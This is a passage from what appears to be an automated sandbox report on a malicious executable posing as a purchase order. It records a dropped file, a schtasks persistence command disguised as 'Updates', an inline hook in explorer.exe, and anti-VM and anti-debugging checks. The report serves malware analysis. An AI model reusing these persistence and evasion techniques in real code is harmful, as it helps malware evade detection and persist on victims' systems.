Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_00C34043 push edi; ret	9_2_00C34047
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_00C33835 push cs; iretd	9_2_00C33846
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_00C37272 push edx; iretd	9_2_00C372B0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_00C3423E push ebp; ret	9_2_00C3423F
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_00C32E51 push CDBD7B17h; retf	9_2_00C32E56
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0185D0D1 push ecx; ret	9_2_0185D0E4
Source: C:\Windows\explorer.exe	Code function: 10_2_04E13831 push cs; iretd	10_2_04E13833
Source: C:\Windows\explorer.exe	Code function: 10_2_04E113E6 pushad ; ret	10_2_04E113E7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034AD0D1 push ecx; ret	13_2_034AD0E4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_009CD83B pushad ; ret	13_2_009CD83C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_009B9BAC push ebx; retf	13_2_009B9BAF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_009CDE8E push eax; ret	13_2_009CDE9C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_009CCEA5 push eax; ret	13_2_009CCEF8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_009CCEFB push eax; ret	13_2_009CCF62
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_009CCEF2 push eax; ret	13_2_009CCEF8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_009CCF5C push eax; ret	13_2_009CCF62

Source: initial sample	Static PE information: section name: .text entropy: 7.247286296
Source: initial sample	Static PE information: section name: .text entropy: 7.247286296

Persistence and Installation Behavior:

Uses ipconfig to lookup or modify the Windows network settings

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe

Source: C:\Users\user\Desktop\PO_210223.exe

File created: C:\Users\user\AppData\Roaming\kwqifureL.exe

Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kwqifureL' /XML 'C:\Users\user\AppData\Local\Temp\tmp33D2.tmp'

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xE6

Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO_210223.exe PID: 6976, type: MEMORY
Source: Yara match	File source: 0.2.PO_210223.exe.2cb671c.1.raw.unpack, type: UNPACKEDPE

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\PO_210223.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PO_210223.exe	RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: 00000000009B98E4 second address: 00000000009B98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: 00000000009B9B4E second address: 00000000009B9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\PO_210223.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\PO_210223.exe

Code function: 9_2_00409A80 rdtsc

9_2_00409A80

Source: C:\Users\user\Desktop\PO_210223.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\PO_210223.exe TID: 6980	Thread sleep time: -99516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe TID: 4632	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6496	Thread sleep time: -58000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6736	Thread sleep time: -50000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 0000000A.00000000.688633268.0000000004710000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.691285014.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000000A.00000000.695692855.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 0000000A.00000000.691690260.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.695692855.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.695811785.000000000A716000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATAa
Source: explorer.exe, 0000000A.00000000.700408324.000000000FD5B000.00000004.00000001.sdmp	Binary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.688633268.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 0000000A.00000000.691285014.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000000A.00000000.695811785.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 0000000A.00000000.691285014.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 0000000A.00000000.695811785.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 0000000A.00000000.691285014.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\PO_210223.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Users\user\Desktop\PO_210223.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\PO_210223.exe

Code function: 9_2_00409A80 rdtsc

9_2_00409A80

Source: C:\Users\user\Desktop\PO_210223.exe

Code function: 9_2_0040ACC0 LdrLoadDll,

9_2_0040ACC0

Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0182C182 mov eax, dword ptr fs:[00000030h]	9_2_0182C182
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0183A185 mov eax, dword ptr fs:[00000030h]	9_2_0183A185
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01832990 mov eax, dword ptr fs:[00000030h]	9_2_01832990
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018361A0 mov eax, dword ptr fs:[00000030h]	9_2_018361A0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018361A0 mov eax, dword ptr fs:[00000030h]	9_2_018361A0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018869A6 mov eax, dword ptr fs:[00000030h]	9_2_018869A6
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018851BE mov eax, dword ptr fs:[00000030h]	9_2_018851BE
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018851BE mov eax, dword ptr fs:[00000030h]	9_2_018851BE
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018851BE mov eax, dword ptr fs:[00000030h]	9_2_018851BE
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018851BE mov eax, dword ptr fs:[00000030h]	9_2_018851BE
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018941E8 mov eax, dword ptr fs:[00000030h]	9_2_018941E8
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0180B1E1 mov eax, dword ptr fs:[00000030h]	9_2_0180B1E1
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0180B1E1 mov eax, dword ptr fs:[00000030h]	9_2_0180B1E1
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0180B1E1 mov eax, dword ptr fs:[00000030h]	9_2_0180B1E1
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01809100 mov eax, dword ptr fs:[00000030h]	9_2_01809100
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01809100 mov eax, dword ptr fs:[00000030h]	9_2_01809100
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01809100 mov eax, dword ptr fs:[00000030h]	9_2_01809100
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01824120 mov eax, dword ptr fs:[00000030h]	9_2_01824120
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01824120 mov eax, dword ptr fs:[00000030h]	9_2_01824120
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01824120 mov eax, dword ptr fs:[00000030h]	9_2_01824120
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01824120 mov eax, dword ptr fs:[00000030h]	9_2_01824120
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01824120 mov ecx, dword ptr fs:[00000030h]	9_2_01824120
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0183513A mov eax, dword ptr fs:[00000030h]	9_2_0183513A
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0183513A mov eax, dword ptr fs:[00000030h]	9_2_0183513A
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0182B944 mov eax, dword ptr fs:[00000030h]	9_2_0182B944
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0182B944 mov eax, dword ptr fs:[00000030h]	9_2_0182B944
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0180C962 mov eax, dword ptr fs:[00000030h]	9_2_0180C962
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0180B171 mov eax, dword ptr fs:[00000030h]	9_2_0180B171
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0180B171 mov eax, dword ptr fs:[00000030h]	9_2_0180B171
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01809080 mov eax, dword ptr fs:[00000030h]	9_2_01809080
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01883884 mov eax, dword ptr fs:[00000030h]	9_2_01883884
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01883884 mov eax, dword ptr fs:[00000030h]	9_2_01883884
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018320A0 mov eax, dword ptr fs:[00000030h]	9_2_018320A0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018320A0 mov eax, dword ptr fs:[00000030h]	9_2_018320A0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018320A0 mov eax, dword ptr fs:[00000030h]	9_2_018320A0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018320A0 mov eax, dword ptr fs:[00000030h]	9_2_018320A0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018320A0 mov eax, dword ptr fs:[00000030h]	9_2_018320A0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018320A0 mov eax, dword ptr fs:[00000030h]	9_2_018320A0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018490AF mov eax, dword ptr fs:[00000030h]	9_2_018490AF
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0183F0BF mov ecx, dword ptr fs:[00000030h]	9_2_0183F0BF
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0183F0BF mov eax, dword ptr fs:[00000030h]	9_2_0183F0BF
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0183F0BF mov eax, dword ptr fs:[00000030h]	9_2_0183F0BF
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0189B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0189B8D0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0189B8D0 mov ecx, dword ptr fs:[00000030h]	9_2_0189B8D0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0189B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0189B8D0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0189B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0189B8D0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0189B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0189B8D0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0189B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0189B8D0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018058EC mov eax, dword ptr fs:[00000030h]	9_2_018058EC
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D4015 mov eax, dword ptr fs:[00000030h]	9_2_018D4015
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D4015 mov eax, dword ptr fs:[00000030h]	9_2_018D4015
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01887016 mov eax, dword ptr fs:[00000030h]	9_2_01887016
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01887016 mov eax, dword ptr fs:[00000030h]	9_2_01887016
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01887016 mov eax, dword ptr fs:[00000030h]	9_2_01887016
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0181B02A mov eax, dword ptr fs:[00000030h]	9_2_0181B02A
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0181B02A mov eax, dword ptr fs:[00000030h]	9_2_0181B02A
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0181B02A mov eax, dword ptr fs:[00000030h]	9_2_0181B02A
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0181B02A mov eax, dword ptr fs:[00000030h]	9_2_0181B02A
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0183002D mov eax, dword ptr fs:[00000030h]	9_2_0183002D
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0183002D mov eax, dword ptr fs:[00000030h]	9_2_0183002D
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0183002D mov eax, dword ptr fs:[00000030h]	9_2_0183002D
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0183002D mov eax, dword ptr fs:[00000030h]	9_2_0183002D
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0183002D mov eax, dword ptr fs:[00000030h]	9_2_0183002D
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01820050 mov eax, dword ptr fs:[00000030h]	9_2_01820050
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01820050 mov eax, dword ptr fs:[00000030h]	9_2_01820050
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D1074 mov eax, dword ptr fs:[00000030h]	9_2_018D1074
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018C2073 mov eax, dword ptr fs:[00000030h]	9_2_018C2073
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018C138A mov eax, dword ptr fs:[00000030h]	9_2_018C138A
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018BD380 mov ecx, dword ptr fs:[00000030h]	9_2_018BD380
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01811B8F mov eax, dword ptr fs:[00000030h]	9_2_01811B8F
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01811B8F mov eax, dword ptr fs:[00000030h]	9_2_01811B8F
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0183B390 mov eax, dword ptr fs:[00000030h]	9_2_0183B390
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01832397 mov eax, dword ptr fs:[00000030h]	9_2_01832397
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D5BA5 mov eax, dword ptr fs:[00000030h]	9_2_018D5BA5
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01834BAD mov eax, dword ptr fs:[00000030h]	9_2_01834BAD
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01834BAD mov eax, dword ptr fs:[00000030h]	9_2_01834BAD
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01834BAD mov eax, dword ptr fs:[00000030h]	9_2_01834BAD
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018853CA mov eax, dword ptr fs:[00000030h]	9_2_018853CA
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018853CA mov eax, dword ptr fs:[00000030h]	9_2_018853CA
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018303E2 mov eax, dword ptr fs:[00000030h]	9_2_018303E2
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018303E2 mov eax, dword ptr fs:[00000030h]	9_2_018303E2
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018303E2 mov eax, dword ptr fs:[00000030h]	9_2_018303E2
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018303E2 mov eax, dword ptr fs:[00000030h]	9_2_018303E2
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018303E2 mov eax, dword ptr fs:[00000030h]	9_2_018303E2
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018303E2 mov eax, dword ptr fs:[00000030h]	9_2_018303E2
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0182DBE9 mov eax, dword ptr fs:[00000030h]	9_2_0182DBE9
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018C131B mov eax, dword ptr fs:[00000030h]	9_2_018C131B
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0180DB40 mov eax, dword ptr fs:[00000030h]	9_2_0180DB40
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018D8B58 mov eax, dword ptr fs:[00000030h]	9_2_018D8B58
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0180F358 mov eax, dword ptr fs:[00000030h]	9_2_0180F358
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0180DB60 mov ecx, dword ptr fs:[00000030h]	9_2_0180DB60
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01833B7A mov eax, dword ptr fs:[00000030h]	9_2_01833B7A
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01833B7A mov eax, dword ptr fs:[00000030h]	9_2_01833B7A
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0183D294 mov eax, dword ptr fs:[00000030h]	9_2_0183D294
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0183D294 mov eax, dword ptr fs:[00000030h]	9_2_0183D294
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018052A5 mov eax, dword ptr fs:[00000030h]	9_2_018052A5
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018052A5 mov eax, dword ptr fs:[00000030h]	9_2_018052A5
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018052A5 mov eax, dword ptr fs:[00000030h]	9_2_018052A5
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018052A5 mov eax, dword ptr fs:[00000030h]	9_2_018052A5
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_018052A5 mov eax, dword ptr fs:[00000030h]	9_2_018052A5
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0181AAB0 mov eax, dword ptr fs:[00000030h]	9_2_0181AAB0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0181AAB0 mov eax, dword ptr fs:[00000030h]	9_2_0181AAB0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_0183FAB0 mov eax, dword ptr fs:[00000030h]	9_2_0183FAB0
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01832ACB mov eax, dword ptr fs:[00000030h]	9_2_01832ACB
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01832AE4 mov eax, dword ptr fs:[00000030h]	9_2_01832AE4
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01818A0A mov eax, dword ptr fs:[00000030h]	9_2_01818A0A
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01805210 mov eax, dword ptr fs:[00000030h]	9_2_01805210
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01805210 mov ecx, dword ptr fs:[00000030h]	9_2_01805210
Source: C:\Users\user\Desktop\PO_210223.exe	Code function: 9_2_01805210 mov eax, dword ptr fs:[00000030h]	9_2_01805210
